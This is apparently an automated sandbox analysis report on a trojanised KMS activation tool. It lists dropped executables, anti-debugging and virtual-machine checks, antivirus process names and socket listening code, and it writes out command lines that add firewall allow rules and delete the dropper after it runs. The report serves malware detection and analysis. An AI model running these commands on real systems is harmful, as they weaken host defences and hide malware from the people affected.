Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0040B174 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,AreFileApisANSI,FindFirstFileA,34_2_0040B174
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0040B6E9 __EH_prolog,FindFirstFileW,GetCurrentDirectoryW,34_2_0040B6E9
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00E68F90 GetVersionExA,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetSystemInfo,GetModuleHandleW,GetProcAddress,GetSystemMetrics,GetModuleHandleW,GetProcAddress,17_2_00E68F90
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, wrme.exe, 00000011.00000002.1339432193.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe, 00000011.00000000.1272801464.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe.1.drBinary or memory string: Server Enterprise without Hyper-V (full installation)
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, wrme.exe, 00000011.00000002.1339432193.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe, 00000011.00000000.1272801464.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe.1.drBinary or memory string: Microsoft Hyper-V Server
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, wrme.exe, 00000011.00000002.1339432193.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe, 00000011.00000000.1272801464.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe.1.drBinary or memory string: Server Datacenter without Hyper-V (full installation)
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, wrme.exe.1.drBinary or memory string: i unknownRtlGetVersionntdll.dllkernel32GetNativeSystemInfokernel32.dllMicrosoft Windows 10Windows Server 2016GetProductInfoBusinessBusiness NHPC EditionServer Hyper Core VHomeHome ChinaHome NHome Single LanguageServer Datacenter (evaluation installation)Server Datacenter, Semi-Annual Channel (core installation)Server Standard, Semi-Annual Channel (core installation)Server DatacenterServer Datacenter (core installation, Windows Server 2008 R2 and earlier)Server Datacenter without Hyper-V (core installation)Server Datacenter without Hyper-V (full installation)EducationEducation NEnterpriseEnterprise EEnterprise EvaluationEnterprise NEnterprise N EvaluationEnterprise 2015 LTSBWindows 10 Enterprise 2015 LTSB EvaluationEnterprise 2015 LTSB NEnterprise 2015 LTSB N EvaluationServer Enterprise (full installation)Server Enterprise (core installation)Server Enterprise without Hyper-V (core installation)Server Enterprise for Itanium-based SystemsServer Enterprise without Hyper-V (full installation)Windows Essential Server Solution AdditionalWindows Essential Server Solution Additional SVCWindows Essential Server Solution ManagementWindows Essential Server Solution Management SVCHome BasicHome Basic NHome PremiumHome Premium NWindows Home Server 2011Windows Storage Server 2008 R2 EssentialsMicrosoft Hyper-V ServerIoT CorePro for WorkstationsPro for Workstations NProPro NWeb Server (full installation)StarterStarter NUltimateUltimate NWeb Server (core installation)Storage Server StandardUnknown Product Windows Vista Windows Server 2008 Windows 7 Windows 8 Windows Server 2008 R2 Windows 8.1 Windows Server 2012 R2 Ultimate EditionProfessionalHome Premium EditionHome Basic EditionEnterprise EditionBusiness EditionStarter EditionCluster Server EditionDatacenter EditionDatacenter Edition (core installation)Enterprise Edition (core installation)Enterprise Edition for Itanium-based SystemsSmall Business ServerSmall Business Server Premium EditionStandard EditionStandard Edition (core installation)Web Server EditionWindows Server 2003 R2, Windows Storage Server 2003Windows Home ServerWindows XP Professional x64 EditionWindows Server 2003, Datacenter Edition for Itanium-based SystemsDatacenter x64 EditionEnterprise x64 EditionStandard x64 EditionCompute Cluster EditionWeb EditionWindows XP Home EditionWindows 2000 Datacenter ServerAdvanced ServerServer (build %d), 64-bit, 32-bitROOT\CIMV2SELECT * FROM Win32_OperatingSystemWQLVersion DI
Source: svchost.exe, 00000018.00000002.2508841896.000001BB85882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000018.00000002.2507970571.000001BB8582B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: J8156NOVDEC.exe, 00000003.00000002.2507675639.000000000133C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWq
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, wrme.exe, 00000011.00000002.1339432193.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe, 00000011.00000000.1272801464.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe.1.drBinary or memory string: Server Enterprise without Hyper-V (core installation)
Source: J8156NOVDEC.exe, 00000003.00000002.2507675639.000000000133C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2514178078.000002C2B745B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2510238437.000002C2B1C2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2513917571.000002C2B741F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: svchost.exe, 00000018.00000002.2508841896.000001BB85864000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 00000018.00000002.2507423273.000001BB85802000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: wrme.exe, 00000011.00000002.1339432193.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe, 00000011.00000000.1272801464.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: i unknownRtlGetVersionntdll.dllkernel32GetNativeSystemInfokernel32.dllMicrosoft Windows 10Windows Server 2016GetProductInfoBusinessBusiness NHPC EditionServer Hyper Core VHomeHome ChinaHome NHome Single LanguageServer Datacenter (evaluation installation)Server Datacenter, Semi-Annual Channel (core installation)Server Standard, Semi-Annual Channel (core installation)Server DatacenterServer Datacenter (core installation, Windows Server 2008 R2 and earlier)Server Datacenter without Hyper-V (core installation)Server Datacenter without Hyper-V (full installation)EducationEducation NEnterpriseEnterprise EEnterprise EvaluationEnterprise NEnterprise N EvaluationEnterprise 2015 LTSBWindows 10 Enterprise 2015 LTSB EvaluationEnterprise 2015 LTSB NEnterprise 2015 LTSB N EvaluationServer Enterprise (full installation)Server Enterprise (core installation)Server Enterprise without Hyper-V (core installation)Server Enterprise for Itanium-based SystemsServer Enterprise without Hyper-V (full installation)Windows Essential Server Solution AdditionalWindows Essential Server Solution Additional SVCWindows Essential Server Solution ManagementWindows Essential Server Solution Management SVCHome BasicHome Basic NHome PremiumHome Premium NWindows Home Server 2011Windows Storage Server 2008 R2 EssentialsMicrosoft Hyper-V ServerIoT CorePro for WorkstationsPro for Workstations NProPro NWeb Server (full installation)StarterStarter NUltimateUltimate NWeb Server (core installation)Storage Server StandardUnknown Product Windows Vista Windows Server 2008 Windows 7 Windows 8 Windows Server 2008 R2 Windows 8.1 Windows Server 2012 R2 Ultimate EditionProfessionalHome Premium EditionHome Basic EditionEnterprise EditionBusiness EditionStarter EditionCluster Server EditionDatacenter EditionDatacenter Edition (core installation)Enterprise Edition (core installation)Enterprise Edition for Itanium-based SystemsSmall Business ServerSmall Business Server Premium EditionStandard EditionStandard Edition (core installation)Web Server EditionWindows Server 2003 R2, Windows Storage Server 2003Windows Home ServerWindows XP Professional x64 EditionWindows Server 2003, Datacenter Edition for Itanium-based SystemsDatacenter x64 EditionEnterprise x64 EditionStandard x64 EditionCompute Cluster EditionWeb EditionWindows XP Home EditionWindows 2000 Datacenter ServerAdvanced ServerServer (build %d), 64-bit, 32-bitROOT\CIMV2SELECT * FROM Win32_OperatingSystemWQLVersion D
Source: svchost.exe, 00000018.00000002.2509181103.000001BB8588E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@\\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, wrme.exe, 00000011.00000002.1339432193.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe, 00000011.00000000.1272801464.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe.1.drBinary or memory string: Server Datacenter without Hyper-V (core installation)
Source: DvLayout.exe, 0000000B.00000002.1276048496.00000000010CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y*9
Source: J8156NOVDEC.exe, 00000003.00000002.2507675639.00000000012DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWf4
Source: svchost.exe, 00000018.00000002.2509181103.000001BB8588E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: wrme.exe, 00000011.00000002.1339700172.0000000000F28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll`
Source: svchost.exe, 00000024.00000002.2507074491.000001F54682B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information queried: ProcessInformation
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: 11_2_00377050 rdtsc 11_2_00377050
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006C02AC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_006C02AC
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeCode function: 4_2_00D65BFC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,4_2_00D65BFC
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeCode function: 1_2_00405F56 GetModuleHandleA,LoadLibraryA,GetProcAddress,1_2_00405F56
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006DD743 mov eax, dword ptr fs:[00000030h]2_2_006DD743
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006DD787 mov eax, dword ptr fs:[00000030h]2_2_006DD787
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006D3AC5 mov eax, dword ptr fs:[00000030h]2_2_006D3AC5
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C9D787 mov eax, dword ptr fs:[00000030h]3_2_00C9D787
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C9D743 mov eax, dword ptr fs:[00000030h]3_2_00C9D743
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C93AC5 mov eax, dword ptr fs:[00000030h]3_2_00C93AC5
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: 11_2_003905BC mov eax, dword ptr fs:[00000030h]11_2_003905BC
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: 11_2_00383769 mov eax, dword ptr fs:[00000030h]11_2_00383769
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe | Code function: 17_2_00ECD4C1 mov eax, dword ptr fs:[00000030h] 17_2_00ECD4C1
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe | Code function: 17_2_00ECD47D mov eax, dword ptr fs:[00000030h] 17_2_00ECD47D
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe | Code function: 17_2_00EB952E mov eax, dword ptr fs:[00000030h] 17_2_00EB952E
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Code function: 2_2_006C0D55 VirtualQuery,GetPdbDllFromInstallPath,GetProcAddress,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc, 2_2_006C0D55
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Code function: 2_2_006C02AC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_006C02AC
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Code function: 2_2_006C5308 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_006C5308
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Code function: 2_2_006BF56B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_006BF56B
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Code function: 3_2_00C802AC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_00C802AC
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Code function: 3_2_00C8040E SetUnhandledExceptionFilter, 3_2_00C8040E
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Code function: 3_2_00C85308 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_00C85308
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Code function: 3_2_00C7F56B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_00C7F56B
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe | Code function: 4_2_00D5A2D5 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_00D5A2D5
Source: C:\Windows\System32\drivers\DvLayout.exe | Code function: 11_2_0037C06F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_0037C06F
Source: C:\Windows\System32\drivers\DvLayout.exe | Code function: 11_2_0037C1D1 SetUnhandledExceptionFilter, 11_2_0037C1D1
Source: C:\Windows\System32\drivers\DvLayout.exe | Code function: 11_2_0037BC98 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_0037BC98
Source: C:\Windows\System32\drivers\DvLayout.exe | Code function: 11_2_00380649 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_00380649
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe | Code function: 17_2_00EB9149 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_00EB9149
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe | Code function: 17_2_00EB5288 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_00EB5288
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe | Code function: 17_2_00EB53EA SetUnhandledExceptionFilter, 17_2_00EB53EA
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe | Code function: 17_2_00EB4C8D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 17_2_00EB4C8D
Source: C:\Windows\_temp07242019502489\7Z.EXE | Code function: 34_2_0046E6AA SetUnhandledExceptionFilter, 34_2_0046E6AA
Source: C:\Windows\_temp07242019502489\7Z.EXE | Code function: 34_2_0046E6BC SetUnhandledExceptionFilter, 34_2_0046E6BC
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe | Memory allocated: page read and write | page guard
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -n 3 127.1 >nul & del /q C:\Users\user~1\AppData\Local\Temp\_J8156NOVDEC.exe
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic BaseBoard get SerialNumber
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.1
Source: C:\Windows\System32\drivers\DvLayout.exe | Process created: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe "C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe" -install
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall delete rule name="HEU_KMS_Activator"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="HEU_KMS_Activator" dir=in action=allow profile=any program="C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe"
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe | Process created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c set "path=%systemroot%;%systemroot%\system32;%systemroot%\system32\wbem;%systemroot%\system32\windowspowershell\v1.0\;" & netsh advfirewall firewall add rule name="heu_kms_activator" dir=in action=allow profile=any program="c:\users\user\appdata\local\temp\heu_kms_activator.exe"
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000291E000.00000004.00000020.00020000.00000000.sdmp, HEU_KMS_Activator.exe, 00000004.00000002.2505981906.0000000000DE4000.00000002.00000001.01000000.00000007.sdmp, 7Z.EXE, 00000022.00000003.1321709735.00000000023AB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: HEU_KMS_Activator.exe, 00000004.00000002.2511304287.0000000001BC2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: HEU_KMS_Activator.exe, 00000004.00000002.2511304287.0000000001BC2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager":
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Code function: 2_2_006C0463 cpuid 2_2_006C0463
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 2_2_006E2476
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Code function: EnumSystemLocalesW, 2_2_006E2763
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Code function: EnumSystemLocalesW, 2_2_006E2718
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Code function: EnumSystemLocalesW, 2_2_006E27FE
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 2_2_006E2889
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Code function: GetLocaleInfoW, 2_2_006E2ADC
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 2_2_006E2C02
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Code function: GetLocaleInfoW, 2_2_006E2D08
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 2_2_006E2DD7
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Code function: EnumSystemLocalesW, 2_2_006DB041
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Code function: GetLocaleInfoW, 2_2_006DB5A3
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 3_2_00CA2476
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Code function: EnumSystemLocalesW, 3_2_00CA27FE
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Code function: EnumSystemLocalesW, 3_2_00CA2763
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Code function: EnumSystemLocalesW, 3_2_00CA2718
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 3_2_00CA2889
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Code function: GetLocaleInfoW, 3_2_00CA2ADC
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 3_2_00CA2C02
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 3_2_00CA2DD7
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Code function: GetLocaleInfoW, 3_2_00CA2D08
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Code function: EnumSystemLocalesW, 3_2_00C9B041
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Code function: GetLocaleInfoW, 3_2_00C9B5A3
Source: C:\Windows\System32\drivers\DvLayout.exe | Code function: GetLocaleInfoW, 11_2_0039995F
Source: C:\Windows\System32\drivers\DvLayout.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 11_2_00399A85
Source: C:\Windows\System32\drivers\DvLayout.exe | Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 11_2_003992F9
Source: C:\Windows\System32\drivers\DvLayout.exe | Code function: GetLocaleInfoW, 11_2_00390B1C
Source: C:\Windows\System32\drivers\DvLayout.exe | Code function: GetLocaleInfoW, 11_2_00399B8B
Source: C:\Windows\System32\drivers\DvLayout.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 11_2_00399C5A
Source: C:\Windows\System32\drivers\DvLayout.exe | Code function: EnumSystemLocalesW, 11_2_0039959B
Source: C:\Windows\System32\drivers\DvLayout.exe | Code function: EnumSystemLocalesW, 11_2_003905FA
Source: C:\Windows\System32\drivers\DvLayout.exe | Code function: EnumSystemLocalesW, 11_2_003995E6
Source: C:\Windows\System32\drivers\DvLayout.exe | Code function: EnumSystemLocalesW, 11_2_00399681
Source: C:\Windows\System32\drivers\DvLayout.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 11_2_0039970C
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe | Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C: VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Code function: 2_2_006C066B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 2_2_006C066B
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Code function: 2_2_006DBD85 _free,_free,_free,GetTimeZoneInformation,_free, 2_2_006DBD85
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe | Code function: 1_2_004060EC GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA, 1_2_004060EC

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\svchost.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Provider\Av\{D68DDC3A-831F-4fae-9E44-DA132C1ACF46} STATE
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c set "Path=%SystemRoot%;%SystemRoot%\system32;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;" & netsh advfirewall firewall delete rule name="HEU_KMS_Activator"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall delete rule name="HEU_KMS_Activator"
Source: svchost.exe, 0000001F.00000002.2509619289.000001F3C1B02000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 360Safe.exe
Source: svchost.exe, 0000001F.00000002.2509619289.000001F3C1B02000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, KMDF_LOOK.sys.1.dr | Binary or memory string: 360Tray.exe
Source: DvLayout.exe, 0000000B.00000002.1275773216.0000000000EF8000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: ccenter.exe
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Code function: 2_2_0068C000 bind,WSAGetLastError,@_RTC_CheckStackVars@8, 2_2_0068C000
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Code function: 2_2_00665120 _strlen,_strlen,_strlen,_strlen,_strlen,___from_strstr_to_strchr,htons,htons,htons,htons,bind,getsockname,WSAGetLastError,htons,htons,WSAGetLastError,@_RTC_CheckStackVars@8, 2_2_00665120
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Code function: 2_2_0067D2A0 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,_strlen,send,recv,_memcmp,closesocket,closesocket,closesocket,closesocket,@_RTC_CheckStackVars@8, 2_2_0067D2A0
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Code function: 2_2_0069BA80 _strlen,_strlen,_strlen,___from_strstr_to_strchr,_strncpy,___from_strstr_to_strchr,_strncpy,___from_strstr_to_strchr,___from_strstr_to_strchr,getsockname,WSAGetLastError,WSAGetLastError,htons,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,WSAGetLastError,listen,WSAGetLastError,htons,htons,@_RTC_CheckStackVars@8, 2_2_0069BA80
